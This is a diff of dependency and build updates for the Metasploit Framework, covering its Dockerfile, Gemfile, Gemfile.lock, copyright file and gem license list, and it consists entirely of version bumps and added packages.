 ENV TOOLS_HOME=/usr/src/tools
@@ -24,6 +24,7 @@ RUN apk add --no-cache \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
+      libffi-dev \
      libpcap-dev \
      libxml2-dev \
      libxslt-dev \
@@ -47,13 +48,13 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
-    tar -zxf go1.21.1.src.tar.gz && \
-    rm go1.21.1.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.24.0.src.tar.gz && \
+    tar -zxf go1.24.0.src.tar.gz && \
+    rm go1.24.0.src.tar.gz && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.2.5-alpine3.20
+FROM ruby:3.3.8-alpine3.21
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -24,13 +24,15 @@ group :development do
  # memory profiling
  gem 'memory_profiler'
  # cpu profiling
-  gem 'ruby-prof', '1.4.2'
+  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  # gem 'metasploit-aggregator'
 end

 group :development, :test do
+  # For ./tools/dev/update_gem_licenses.sh
+  gem 'license_finder', '5.11.1'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
@@ -38,7 +40,7 @@ group :development, :test do
  gem 'rspec-rails'
  gem 'rspec-rerun'
  # Required during CI as well local development
-  gem 'rubocop'
+  gem 'rubocop', '1.75.7'
 end

 group :test do
@@ -1,12 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.41)
+    metasploit-framework (6.4.79)
      aarch64
      abbrev
-      actionpack (~> 7.0.0)
-      activerecord (~> 7.0.0)
-      activesupport (~> 7.0.0)
+      actionpack (~> 7.2.0)
+      activerecord (~> 7.2.0)
+      activesupport (~> 7.2.0)
      aws-sdk-ec2
      aws-sdk-ec2instanceconnect
      aws-sdk-iam
@@ -15,6 +15,7 @@ PATH
      base64
      bcrypt
      bcrypt_pbkdf
+      benchmark
      bigdecimal
      bootsnap
      bson
@@ -31,20 +32,22 @@ PATH
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
+      fiddle
      filesize
      getoptlong
      hrr_rb_ssh-ed25519
      http-cookie
-      irb (~> 1.7.4)
+      irb
      jsobfu
      json
+      lru_redux
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.189)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.35)
+      metasploit-payloads (= 2.0.221)
+      metasploit_data_models (>= 6.0.7)
+      metasploit_payloads-mettle (= 1.0.42)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -60,14 +63,16 @@ PATH
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
+      ostruct
      packetfu
      patch_finder
      pcaprub
      pdf-reader
      pg
      puma
+      rack
      railties
-      rasn1 (= 0.13.0)
+      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
@@ -90,15 +95,18 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rinda
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.3)
+      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
      sinatra
      sqlite3 (= 1.7.3)
      sshkey
+      stringio (= 3.1.1)
      swagger-blocks
+      syslog
      thin
      tzinfo
      tzinfo-data
@@ -114,102 +122,118 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.1)
+    Ascii85 (2.0.1)
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.0.8.6)
-      actionview (= 7.0.8.6)
-      activesupport (= 7.0.8.6)
-      rack (~> 2.0, >= 2.2.4)
+    actionpack (7.2.2.1)
+      actionview (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
+      nokogiri (>= 1.8.5)
+      racc
+      rack (>= 2.2.4, < 3.2)
+      rack-session (>= 1.0.1)
      rack-test (>= 0.6.3)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8.6)
-      activesupport (= 7.0.8.6)
+      rails-dom-testing (~> 2.2)
+      rails-html-sanitizer (~> 1.6)
+      useragent (~> 0.16)
+    actionview (7.2.2.1)
+      activesupport (= 7.2.2.1)
      builder (~> 3.1)
-      erubi (~> 1.4)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8.6)
-      activesupport (= 7.0.8.6)
-    activerecord (7.0.8.6)
-      activemodel (= 7.0.8.6)
-      activesupport (= 7.0.8.6)
-    activesupport (7.0.8.6)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
+      erubi (~> 1.11)
+      rails-dom-testing (~> 2.2)
+      rails-html-sanitizer (~> 1.6)
+    activemodel (7.2.2.1)
+      activesupport (= 7.2.2.1)
+    activerecord (7.2.2.1)
+      activemodel (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
+      timeout (>= 0.4.0)
+    activesupport (7.2.2.1)
+      base64
+      benchmark (>= 0.3)
+      bigdecimal
+      concurrent-ruby (~> 1.0, >= 1.3.1)
+      connection_pool (>= 2.2.5)
+      drb
      i18n (>= 1.6, < 2)
+      logger (>= 1.4.2)
      minitest (>= 5.1)
-      tzinfo (~> 2.0)
+      securerandom (>= 0.3)
+      tzinfo (~> 2.0, >= 2.0.5)
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.24.5)
-      allure-ruby-commons (= 2.24.5)
+    allure-rspec (2.26.0)
+      allure-ruby-commons (= 2.26.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.24.5)
+    allure-ruby-commons (2.26.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
-      uuid (>= 2.3, < 3)
-    arel-helpers (2.15.0)
-      activerecord (>= 3.1.0, < 8)
-    ast (2.4.2)
-    aws-eventstream (1.3.0)
-    aws-partitions (1.999.0)
-    aws-sdk-core (3.211.0)
+    arel-helpers (2.16.0)
+      activerecord (>= 3.1.0, < 8.1)
+    ast (2.4.3)
+    aws-eventstream (1.3.2)
+    aws-partitions (1.1065.0)
+    aws-sdk-core (3.220.1)
      aws-eventstream (~> 1, >= 1.3.0)
      aws-partitions (~> 1, >= 1.992.0)
      aws-sigv4 (~> 1.9)
+      base64
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.486.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-ec2 (1.511.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-ec2instanceconnect (1.52.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-ec2instanceconnect (1.55.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-iam (1.112.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-iam (1.119.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-kms (1.95.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-kms (1.99.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-s3 (1.169.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-s3 (1.182.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.5)
-    aws-sdk-ssm (1.183.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-ssm (1.191.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sigv4 (1.10.1)
+    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
-    bigdecimal (3.1.8)
+    benchmark (0.4.1)
+    bigdecimal (3.2.2)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.1)
+    bson (5.0.2)
    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.3.4)
+    concurrent-ruby (1.3.5)
+    connection_pool (2.5.3)
    cookiejar (0.3.4)
    crass (1.0.6)
-    csv (3.3.0)
+    csv (3.3.2)
    daemons (1.4.1)
-    date (3.3.4)
-    debug (1.8.0)
-      irb (>= 1.5.0)
-      reline (>= 0.3.1)
-    diff-lcs (1.5.1)
-    dnsruby (1.72.2)
+    date (3.4.1)
+    debug (1.10.0)
+      irb (~> 1.10)
+      reline (>= 0.3.8)
+    diff-lcs (1.6.2)
+    dnsruby (1.72.4)
+      base64 (~> 0.2.0)
+      logger (~> 1.6.5)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
-    drb (2.2.1)
+    drb (2.2.3)
    ed25519 (1.3.0)
    elftools (1.3.1)
      bindata (~> 2)
@@ -222,13 +246,14 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.13.0)
+    erb (5.0.2)
+    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.0)
-      activesupport (>= 5.0.0)
-    factory_bot_rails (6.4.4)
+    factory_bot (6.5.4)
+      activesupport (>= 6.1.0)
+    factory_bot_rails (6.5.0)
      factory_bot (~> 6.5)
-      railties (>= 5.0.0)
+      railties (>= 6.1.0)
    faker (3.5.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
@@ -242,8 +267,10 @@ GEM
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
+    forwardable (1.3.3)
    getoptlong (0.2.1)
    gssapi (1.3.1)
      ffi (>= 1.0.1)
@@ -255,53 +282,73 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.7)
+    http-cookie (1.0.8)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
-    httpclient (2.8.3)
-    i18n (1.14.6)
+    httpclient (2.9.0)
+      mutex_m
+    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
-    io-console (0.7.2)
-    irb (1.7.4)
-      reline (>= 0.3.6)
+    io-console (0.8.1)
+    ipaddr (1.2.7)
+    irb (1.15.2)
+      pp (>= 0.6.0)
+      rdoc (>= 4.0.0)
+      reline (>= 0.4.2)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.7.5)
-    language_server-protocol (3.17.0.3)
+    json (2.10.2)
+    language_server-protocol (3.17.0.5)
+    license_finder (5.11.1)
+      bundler
+      rubyzip (>= 1, < 3)
+      thor
+      toml (= 0.2.0)
+      with_env (= 1.1.0)
+      xml-simple
+    lint_roller (1.1.0)
    little-plugger (1.1.4)
-    logger (1.6.1)
+    logger (1.6.6)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.23.1)
+    loofah (2.24.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
-    macaddr (1.7.2)
-      systemu (~> 2.6.5)
+    lru_redux (1.1.0)
    memory_profiler (1.1.0)
    metasm (1.0.5)
-    metasploit-concern (5.0.3)
+    metasploit-concern (5.0.5)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
+      drb
+      mutex_m
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.11)
+    metasploit-credential (6.0.16)
+      bigdecimal
+      csv
+      drb
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
+      mutex_m
      net-ssh
      pg
      railties
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.2)
+    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
+      bigdecimal
+      drb
+      mutex_m
      railties (~> 7.0)
-    metasploit-payloads (2.0.189)
-    metasploit_data_models (6.0.5)
+    metasploit-payloads (2.0.221)
+    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -311,22 +358,22 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.35)
+    metasploit_payloads-mettle (1.0.42)
    method_source (1.1.0)
    mime-types (3.6.0)
      logger
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2024.1001)
-    mini_portile2 (2.8.7)
-    minitest (5.25.1)
+    mime-types-data (3.2025.0304)
+    mini_portile2 (2.8.9)
+    minitest (5.25.5)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.3)
      ruby2_keywords (~> 0.0.1)
-    mutex_m (0.2.0)
+    mutex_m (0.3.0)
    nessus_rest (0.1.6)
-    net-imap (0.5.0)
+    net-imap (0.5.6)
      date
      net-protocol
    net-ldap (0.19.0)
@@ -334,13 +381,13 @@ GEM
      timeout
    net-sftp (4.0.0)
      net-ssh (>= 5.0.0, < 8.0.0)
-    net-smtp (0.5.0)
+    net-smtp (0.5.1)
      net-protocol
    net-ssh (7.3.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.16.7)
+    nokogiri (1.18.9)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
@@ -351,155 +398,183 @@ GEM
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.26.3)
-    parser (3.3.5.0)
+    parallel (1.27.0)
+    parser (3.3.8.0)
      ast (~> 2.4.1)
      racc
+    parslet (1.8.2)
    patch_finder (1.0.2)
    pcaprub (0.13.3)
-    pdf-reader (2.12.0)
-      Ascii85 (~> 1.0)
+    pdf-reader (2.14.1)
+      Ascii85 (>= 1.0, < 3.0, != 2.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
    pg (1.5.9)
+    pp (0.6.2)
+      prettyprint
+    prettyprint (0.2.0)
+    prism (1.4.0)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
+    psych (5.2.6)
+      date
+      stringio
    public_suffix (6.0.1)
-    puma (6.4.3)
+    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.10)
+    rack (2.2.17)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
-    rack-test (2.1.0)
+    rack-session (1.0.2)
+      rack (< 3)
+    rack-test (2.2.0)
      rack (>= 1.3)
-    rails-dom-testing (2.2.0)
+    rackup (1.0.1)
+      rack (< 3)
+      webrick
+    rails-dom-testing (2.3.0)
      activesupport (>= 5.0.0)
      minitest
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.6.0)
+    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
-      nokogiri (~> 1.14)
-    railties (7.0.8.6)
-      actionpack (= 7.0.8.6)
-      activesupport (= 7.0.8.6)
-      method_source
+      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
+    railties (7.2.2.1)
+      actionpack (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
+      irb (~> 1.13)
+      rackup (>= 1.0.0)
      rake (>= 12.2)
-      thor (~> 1.0)
-      zeitwerk (~> 2.5)
+      thor (~> 1.0, >= 1.2.2)
+      zeitwerk (~> 2.6)
    rainbow (3.1.1)
-    rake (13.2.1)
-    rasn1 (0.13.0)
+    rake (13.3.0)
+    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.11)
+    rdoc (6.14.2)
+      erb
+      psych (>= 4.0.0)
+    recog (3.1.14)
      nokogiri
-    redcarpet (3.6.0)
-    regexp_parser (2.9.2)
-    reline (0.5.10)
+    redcarpet (3.6.1)
+    regexp_parser (2.10.0)
+    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.16)
+    rex-arch (0.1.18)
      rex-text
-    rex-bin_tools (0.1.9)
+    rex-bin_tools (0.1.10)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.32)
-    rex-encoder (0.1.7)
+    rex-core (0.1.34)
+    rex-encoder (0.1.8)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.40)
+    rex-exploitation (0.1.41)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.7)
-    rex-mime (0.1.8)
+    rex-java (0.1.8)
+    rex-mime (0.1.11)
      rex-text
-    rex-nop (0.1.3)
+    rex-nop (0.1.4)
      rex-arch
-    rex-ole (0.1.8)
+    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.100)
+    rex-powershell (0.1.101)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.13)
+    rex-random_identifier (0.1.16)
+      bigdecimal
      rex-text
-    rex-registry (0.1.5)
-    rex-rop_builder (0.1.5)
+    rex-registry (0.1.6)
+    rex-rop_builder (0.1.6)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.57)
+    rex-socket (0.1.62)
+      dnsruby
      rex-core
-    rex-sslscan (0.1.10)
+    rex-sslscan (0.1.13)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.4)
-    rex-text (0.2.59)
-    rex-zip (0.1.5)
+    rex-struct2 (0.1.5)
+    rex-text (0.2.61)
+      bigdecimal
+    rex-zip (0.1.6)
      rex-text
-    rexml (3.3.9)
+    rexml (3.4.1)
+    rinda (0.2.0)
+      drb
+      forwardable
+      ipaddr
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
-    rspec-core (3.13.2)
+    rspec-core (3.13.5)
      rspec-support (~> 3.13.0)
-    rspec-expectations (3.13.3)
+    rspec-expectations (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.2)
+    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (7.0.1)
-      actionpack (>= 7.0)
-      activesupport (>= 7.0)
-      railties (>= 7.0)
+    rspec-rails (8.0.1)
+      actionpack (>= 7.2)
+      activesupport (>= 7.2)
+      railties (>= 7.2)
      rspec-core (~> 3.13)
      rspec-expectations (~> 3.13)
      rspec-mocks (~> 3.13)
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.1)
-    rubocop (1.67.0)
+    rspec-support (3.13.4)
+    rubocop (1.75.7)
      json (~> 2.3)
-      language_server-protocol (>= 3.17.0)
+      language_server-protocol (~> 3.17.0.2)
+      lint_roller (~> 1.1.0)
      parallel (~> 1.10)
      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 2.4, < 3.0)
-      rubocop-ast (>= 1.32.2, < 2.0)
+      regexp_parser (>= 2.9.3, < 3.0)
+      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.33.0)
-      parser (>= 3.3.1.0)
+      unicode-display_width (>= 2.4.0, < 4.0)
+    rubocop-ast (1.44.1)
+      parser (>= 3.3.7.2)
+      prism (~> 1.4)
    ruby-macho (4.1.0)
-    ruby-mysql (4.1.0)
-    ruby-prof (1.4.2)
+    ruby-mysql (4.2.0)
+    ruby-prof (1.7.2)
+      base64
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.13)
+    ruby_smb (3.3.15)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
@@ -507,10 +582,11 @@ GEM
      windows_error (>= 0.1.4)
    rubyntlm (0.6.5)
      base64
-    rubyzip (2.3.2)
+    rubyzip (2.4.1)
    sawyer (0.9.2)
      addressable (>= 2.3.5)
      faraday (>= 0.17.3, < 3)
+    securerandom (0.4.1)
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
@@ -524,32 +600,38 @@ GEM
    sqlite3 (1.7.3)
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
+    stringio (3.1.1)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
-    systemu (2.6.5)
-    test-prof (1.4.2)
+    syslog (0.3.0)
+      logger
+    test-prof (1.4.4)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.3.2)
-    tilt (2.4.0)
+    thor (1.4.0)
+    tilt (2.6.0)
    timecop (0.9.10)
-    timeout (0.4.1)
+    timeout (0.4.3)
+    toml (0.2.0)
+      parslet (~> 1.8.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2024.2)
+    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (2.6.0)
+    unicode-display_width (3.1.4)
+      unicode-emoji (~> 4.0, >= 4.0.4)
+    unicode-emoji (4.0.4)
    unix-crypt (1.3.1)
-    uuid (2.3.9)
-      macaddr (~> 1.0)
+    useragent (0.16.11)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.8.2)
-    websocket-driver (0.7.6)
+    webrick (1.9.1)
+    websocket-driver (0.7.7)
+      base64
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
@@ -564,13 +646,16 @@ GEM
      nori (~> 2.0, >= 2.7.1)
      rexml (~> 3.0)
      rubyntlm (~> 0.6.0, >= 0.6.3)
+    with_env (1.1.0)
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
+    xml-simple (1.1.9)
+      rexml
    xmlrpc (0.3.3)
      webrick
    yard (0.9.37)
-    zeitwerk (2.6.18)
+    zeitwerk (2.7.3)

 PLATFORMS
  ruby
@@ -580,6 +665,7 @@ DEPENDENCIES
  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
+  license_finder (= 5.11.1)
  memory_profiler
  metasploit-framework!
  octokit
@@ -588,8 +674,8 @@ DEPENDENCIES
  redcarpet
  rspec-rails
  rspec-rerun
-  rubocop
-  ruby-prof (= 1.4.2)
+  rubocop (= 1.75.7)
+  ruby-prof
  simplecov (= 0.18.2)
  test-prof
  timecop
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: https://www.metasploit.com/

 Files: *
-Copyright: 2006-2020, Rapid7, Inc.
+Copyright: 2006-2025, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -1,219 +1,243 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.1, MIT
+Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.0.8.6, MIT
-actionview, 7.0.8.6, MIT
-activemodel, 7.0.8.6, MIT
-activerecord, 7.0.8.6, MIT
-activesupport, 7.0.8.6, MIT
+actionpack, 7.2.2.1, MIT
+actionview, 7.2.2.1, MIT
+activemodel, 7.2.2.1, MIT
+activerecord, 7.2.2.1, MIT
+activesupport, 7.2.2.1, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.24.5, "Apache 2.0"
-allure-ruby-commons, 2.24.5, "Apache 2.0"
-arel-helpers, 2.15.0, MIT
-ast, 2.4.2, MIT
-aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.999.0, "Apache 2.0"
-aws-sdk-core, 3.211.0, "Apache 2.0"
-aws-sdk-ec2, 1.486.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
-aws-sdk-iam, 1.112.0, "Apache 2.0"
-aws-sdk-kms, 1.95.0, "Apache 2.0"
-aws-sdk-s3, 1.169.0, "Apache 2.0"
-aws-sdk-ssm, 1.183.0, "Apache 2.0"
-aws-sigv4, 1.10.1, "Apache 2.0"
+allure-rspec, 2.26.0, "Apache 2.0"
+allure-ruby-commons, 2.26.0, "Apache 2.0"
+arel-helpers, 2.16.0, MIT
+ast, 2.4.3, MIT
+aws-eventstream, 1.3.2, "Apache 2.0"
+aws-partitions, 1.1065.0, "Apache 2.0"
+aws-sdk-core, 3.220.1, "Apache 2.0"
+aws-sdk-ec2, 1.511.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.55.0, "Apache 2.0"
+aws-sdk-iam, 1.119.0, "Apache 2.0"
+aws-sdk-kms, 1.99.0, "Apache 2.0"
+aws-sdk-s3, 1.182.0, "Apache 2.0"
+aws-sdk-ssm, 1.191.0, "Apache 2.0"
+aws-sigv4, 1.11.0, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
-bigdecimal, 3.1.8, "ruby, Simplified BSD"
+benchmark, 0.4.1, "ruby, Simplified BSD"
+bigdecimal, 3.2.2, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.1, "Apache 2.0"
+bson, 5.0.2, "Apache 2.0"
 builder, 3.3.0, MIT
 bundler, 2.5.10, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.4, MIT
+concurrent-ruby, 1.3.5, MIT
+connection_pool, 2.5.3, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
-csv, 3.3.0, "ruby, Simplified BSD"
+csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.4, "ruby, Simplified BSD"
-debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.72.2, "Apache 2.0"
+date, 3.4.1, "ruby, Simplified BSD"
+debug, 1.10.0, "ruby, Simplified BSD"
+diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+dnsruby, 1.72.4, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-drb, 2.2.1, "ruby, Simplified BSD"
+drb, 2.2.3, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erubi, 1.13.0, MIT
+erb, 5.0.2, "ruby, Simplified BSD"
+erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.0, MIT
-factory_bot_rails, 6.4.4, MIT
+factory_bot, 6.5.4, MIT
+factory_bot_rails, 6.5.0, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+forwardable, 1.3.3, "ruby, Simplified BSD"
 getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.7, MIT
+http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
-httpclient, 2.8.3, ruby
-i18n, 1.14.6, MIT
-io-console, 0.7.2, "ruby, Simplified BSD"
-irb, 1.7.4, "ruby, Simplified BSD"
+httpclient, 2.9.0, ruby
+i18n, 1.14.7, MIT
+io-console, 0.8.1, "ruby, Simplified BSD"
+ipaddr, 1.2.7, "ruby, Simplified BSD"
+irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.7.5, ruby
-language_server-protocol, 3.17.0.3, MIT
+json, 2.10.2, ruby
+language_server-protocol, 3.17.0.5, MIT
+license_finder, 5.11.1, MIT
+lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.6.1, "ruby, Simplified BSD"
+logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.23.1, MIT
-macaddr, 1.7.2, ruby
+loofah, 2.24.1, MIT
